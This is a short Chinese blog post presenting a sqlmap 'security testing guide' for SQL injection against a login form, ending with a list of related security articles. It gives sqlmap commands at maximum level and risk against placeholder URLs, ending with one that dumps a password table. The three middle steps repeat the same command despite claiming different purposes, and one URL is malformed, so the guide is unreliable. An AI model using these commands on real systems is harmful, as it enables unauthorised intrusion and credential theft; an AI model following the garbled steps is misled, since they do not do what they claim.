sqlmap安全测试使用指南

注入测试

找到登录接口,判别字段username password

然后输入指令

bash 复制代码
python sqlmap.py -u "https://xxx" --data="username=test&password=test" --batch --level=5 --risk=3 --threads=4 --force-ssl  --flush-session

查看有哪些库表

bash 复制代码
python sqlmap.py -u "https://xxx" --data="username=test&password=test" --batch --level=5 --risk=3 --threads=4 --force-ssl  --flush-session

根据数据库查看表中的列

bash 复制代码
python sqlmap.py -u "https:/xxx" --data="username=test&password=test" --batch --level=5 --risk=3 --threads=4 --force-ssl  --flush-session

查看数据库密码字段

bash 复制代码
python sqlmap.py -u "https://xxxx" --data="username=test&password=test" --batch --dbms=sqlite --level=5 --risk=3 -p username --threads=4 -T passwd -C 字段1,字段2,字段3,.... --dump
相关推荐
黄金龙PLUS4 小时前
5个1280比特大状态置换算法的设计与分析
算法·网络安全·密码学·哈希算法·同态加密
三8444 小时前
TLS + Web API 安全 · 03 · TLS 实战:证书、漏洞与抓包中间人
网络安全·tls·中间人·ca证书
大棉花哥哥8 小时前
太空安全,正式上线 —— 博客改版与双专栏发布记
安全·网络安全·卫星安全
光依旧10 小时前
MCP实战手记(九):生产化MCP Server的6层安全防护
java·人工智能·spring boot·安全·网络安全·ai agent·mcp
admin and root19 小时前
「AI安全篇」实战AntiDebug自动化JS逆向加解密MCP
javascript·人工智能·网络安全·自动化·漏洞挖掘·cnvd·src赏金
泛联新安1 天前
软件定义汽车时代,如何让AI研发“可信”?——泛联新安构建汽车企业级可信AI体系的落地路径
大数据·人工智能·安全·网络安全·汽车·漏洞挖掘·代码安全
菩提小狗1 天前
每日安全情报报告 · 2026-09-29
网络安全·漏洞·cve·安全情报·每日安全
Daorigin_com1 天前
道本科技携手DeepSeek:以AI重塑合同全生命周期管理
前端·人工智能·科技·网络安全·数据挖掘·前端框架·传媒
白帽攻防录1 天前
SRC 挖洞:Apache Tomcat 加密拦截器绕过深度复盘,CVE-2026-34486 fail-open 一行代码怎么打穿集群通信
java·网络安全·tomcat·apache
学逆向的1 天前
win32消息类型
windows·网络安全·mfc·api·win32